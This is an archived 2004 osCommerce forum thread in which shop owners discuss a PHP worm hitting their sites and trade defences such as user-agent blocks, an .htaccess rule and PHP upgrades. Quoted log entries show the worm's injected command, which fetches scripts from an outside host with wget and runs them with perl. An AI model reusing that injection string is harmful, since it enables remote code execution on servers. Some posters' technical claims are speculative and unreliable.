BoulderDash Posted December 26, 2004 Posted December 26, 2004 Hey there guys, I'm using a modified "Who's Online" and see the following on my site: IP: 67.18.29.154 User Agent: lwp::simple/5.803 Last Click: /index.php/cPath/117_164?osCsid=http://www.visualcoders.net/spy.gif?&cmd=cd%20/tmp;wget%20www.visualcoders.net/spybot.txt;wget%20www.visualcoders.net/worm1.txt;wget%20www.visualcoders.net/php.txt;wget%20www.visualcoders.net/ownz.txt;wget%20www.visualcoder Session ID: http://www.visualcoders.net/spy.gif? What is the above (a spider, a customer, some cheesy script)? I once read an artivel that stated that Amazon.com blocked all lwp requests... are they bad? How would I block them in osCommerce if they are? Thanks a ton in advance for anyone looking into this, BD
user99999999 Posted December 26, 2004 Posted December 26, 2004 Looks like some type of worm. http://digested.blogspot.com http://wordpress.org/support/7/19285
user99999999 Posted December 26, 2004 Posted December 26, 2004 I had 50 different server ips mostly xxxxxx.somehostingcompany.com for the 25th so it must be doing something. I just added this to my application top and other index.php pages. if (strpos($_SERVER[HTTP_USER_AGENT], 'lwp-trivial') > 0) { exit; }; At least I wont wake up tomarrow with bandwith exceded problems. Thanks for the tip.
Rob123 Posted December 26, 2004 Posted December 26, 2004 FYI, lwp::simple is a perl mod. LWP stands for Library for WWW in Perl (I think). As the name alludes, "simple" means this version does not have the bells and whistles of other mods. LWP is used for automating tasks with websites. Unless you are running this against your own site, there would likely be no "decent" use of it. Bots that use LWP likely change their user agent to something recognizable. user99999999, As I understand, lwp-trivial is the default user agent for lwp::simple. Disabling the requests from lwp-trivial may work today... but I'm sure that one day the code could change the user agent to something else or something random. Just my 2 cents and I hope I didn't bore anyone too much, Robert
BoulderDash Posted December 26, 2004 Author Posted December 26, 2004 So, Is there some way to block these types of "wget" requests (which aren't really customers)? I mean, even the osC ID they create is phoney. Thanks, BD
user99999999 Posted December 26, 2004 Posted December 26, 2004 Thanks Rob. I knew that since I used it many years before switching to cURL. The user agent can easilyt be changed for any client, its not ment to indicate who they are but rather who I am. I think I will block all LWP as these tend to be bots, email harvestors, and worms made by someone that didnt know what they are doin, any usefull search spider or client browser would never use this.
Millie Posted December 26, 2004 Posted December 26, 2004 I also had this worm attack start yesterday and asked my host for help. Here's there reply. You must upgrade your cart ASAP. There is a security breach in itallowing hackers to run commands on the server :( Get someone on this right away; LMK. We have to disable your /www/ folder in the meantime - or at least the cart's php scripts. See this part &cmd=cd%20/tmp; The script should not allow "cmd". 216.67.227.252 - - [26/Dec/2004:01:45:27 -0500] "GET /index.php/cPath/133?osCsid=http://www.visualcoders.net/spy.gif?&cmd =cd%20/tmp;wget%20www.visualcoders.net/spybot.txt;wget%20www.visualc oders.net/worm1.txt;wget%20www.visualcoders.net/php.txt;wget%20www.v isualcoders.net/ownz.txt;wget%20www.visualcoders.net/zone.txt;perl%2 0spybot.txt;perl%20worm1.txt;perl%20ownz.txt;perl%20php.txt HTTP/1.1" 200 45875 "-" "LWP::Simple/5.801" So they shut down my site and I do not know how to disallow cmd. Can anyone help me out? Is my host pinpointing the correct problem? Millie
Rob123 Posted December 26, 2004 Posted December 26, 2004 I think I will block all LWP as these tend to be bots, email harvestors, and worms made by someone that didnt know what they are doin, any usefull search spider or client browser would never use this. <{POST_SNAPBACK}> Excellent point... I did not mean that you would be wasting time... just not to expect 100% protection. (I wasn't clear minded at 2am) I also had this worm attack start yesterday and asked my host for help. Here's there reply. So they shut down my site and I do not know how to disallow cmd. Can anyone help me out? Is my host pinpointing the correct problem? Millie <{POST_SNAPBACK}> Yeah... I suggest that you change hosts. The best solution is for your host to upgrade to php 4.3.10 . I love my host but can not mention it by name. (It does have a large blue banner in the header.) They can get pricey but you get what you pay for. The good news is that it does not seem that your site is down. I looked at the site in your profile and it's up and running.
Millie Posted December 26, 2004 Posted December 26, 2004 Yeah... I suggest that you change hosts. The best solution is for your host to upgrade to php 4.3.10 . I am severely lacking in information and do not know if there is credibility to my host stating that there is a security issue with oscommerce (running cmd) or if all the responsibility lies with the version of php being run. I have a backup site on another host and I could begin switching but I do not want to take a security threat with me. The good news is that it does not seem that your site is down. I looked at the site in your profile and it's up and running. Sadly, that is not the site of concern. My income producing site has been disabled. It's up to me to educate my host, if appropriate, or fix the security issue. Can you point me towards applicable we resources for further research? Millie
Rob123 Posted December 26, 2004 Posted December 26, 2004 To make a long story short, I do not believe there is a problem with osCommerce. (I am not an expert or a team member, just some guy with a pc) I did not hear of any problems from the worm to osCommerce sites other than it using up bandwidth (The worm tries and tries but doesn't succeed). As I understand it PHP 4.3.10 is not vunerable at all. BTW, your host turned off your site, which is different than the worm causing some direct damage. 1st you should ask you host to provide information about the security breach that they are claiming. They are the experts and you are paying them. (Getting multiple requests from a worm is not a breach) 2nd You should ask your host to upgrade PHP to 4.3.10. It's been out for over a week and it resolves eight (8) "Very Serious" issues. More info... 3rd. You can refer your host to the many sites that say it's a phpBB 2.x problem not an osC problem http://wordpress.org/support/7/19285 or http://securityresponse.symantec.com/avcen...rl.santy.c.html Perhaps another board user could help provide information that is more convincing to your host. Hope that helps, Robert P.S. I still think it's a bit amateurish for your host to send an email with "LMK"
BoulderDash Posted December 26, 2004 Author Posted December 26, 2004 So, Would the following (placed at the top of "~/includes/application_top.php") stop them from taking bandwidth and data, since they can't really "cmd" anything with osC: if (strpos($_SERVER[HTTP_USER_AGENT], 'lwp::simple') > 0) { exit; }; if (strpos($_SERVER[HTTP_USER_AGENT], 'lwp-trivial') > 0) { exit; }; Thanks! BD
♥Vger Posted December 26, 2004 Posted December 26, 2004 This is the problem A serious bug was discovered in php in function unserialize(). That bug can be used to cause serious damage to websites that use software that uses that function. And this can only be resolved either by tracking down any and every php script that might use that function (on the whole server) - or by your host upgrading that server to PHP 4.3.10 or PHP 5+. Vger
bjhampe Posted December 27, 2004 Posted December 27, 2004 My host's PHP is 4.3.10 and they still said there was an issue. However I do not know if they updgraded after the attack or not. They just told me that my site's index and articles.php were used to send about 60M/s worth of data out on Christmas Day.
♥Vger Posted December 27, 2004 Posted December 27, 2004 This worm works not just by sending your data out, but also by putting data into your site - so if it had been the worm I would have expected your site to be defaced at the same time that the data was sent out. I would just check to make sure that you are not running any insecure and/or outdated scripts such as phpBB, Invision Board, VBulletin, phpNuke, Post Nuke etc. Provided that you're not, and your host has upgraded to php 4.3.10 this should not be an issue for you in future. Vger My host's PHP is 4.3.10 and they still said there was an issue. However I do not know if they updgraded after the attack or not. They just told me that my site's index and articles.php were used to send about 60M/s worth of data out on Christmas Day. <{POST_SNAPBACK}>
stevel Posted December 27, 2004 Posted December 27, 2004 What puzzles me is that this is the Santy.C worm, which is trying to attack phpBB forums. It does not exploit a flaw in PHP itself. It is not clear to me, from descriptions of the worm I have read, that there is a reason for it to try to attack sites without phpBB, but I have seen it try on my site that doesn't have phpBB. See http://securityresponse.symantec.com/avcen...rl.santy.c.html I added the following code to my .htaccess to block it and similar worms: RewriteEngine On RewriteCond %{QUERY_STRING} :/ [NC] RewriteRule ^ - [F] Steve Contributions: Country-State Selector Login Page a la Amazon Protection of Configuration Updated spiders.txt Embed Links with SID in Description
♥Vger Posted December 27, 2004 Posted December 27, 2004 Yes Steve, the situation is a little confusing. Originally this worm was something that only attacked insecurities in certain softwares such as phpBB, but then they found out it could be used to hack VBulletin, Invision Board etc. In its next development it was found that it could attack any version of PHP itself that was not secure. It then became the first PHP Worm. This vulnerability includes all versions of PHP up to and including php 4.3.9. The only 'safe' PHP versions are 4.3.10 and 5+ This was posted on www.phpbbstyles.com AFTER phpBB itself was patched, with the effect that if phpBB was on an insecure server it needed a further patch applied to protect it. A serious bug was discovered in php in function unserialize(). That bug can be used to cause serious damage to websites that use software that uses that function. Unfortunately phpBB uses that function to store data in cookies, so phpBB can be exploited (so is IPB, vBulletin and almost all other php forum systems). Vger
stevel Posted December 27, 2004 Posted December 27, 2004 Ah, isn't this fun! (Not!) Luckily my host had already done the appropriate PHP updates as soon as they came out. As has been noted, the worm exploiting the PHP bug is not really Santy, but something that borrows some of its techniques. I see some uses of unserialize in osCommerce. Some seem to be a function of the same name declared in classes/shopping_cart.php, but there are references in classes/sessions.php and functions/cache.php that may be using the PHP function. So, it is clearly a requirement to make sure your host keeps up with PHP updates. Steve Contributions: Country-State Selector Login Page a la Amazon Protection of Configuration Updated spiders.txt Embed Links with SID in Description
New 
Recommended Posts
Archived
This topic is now archived and is closed to further replies.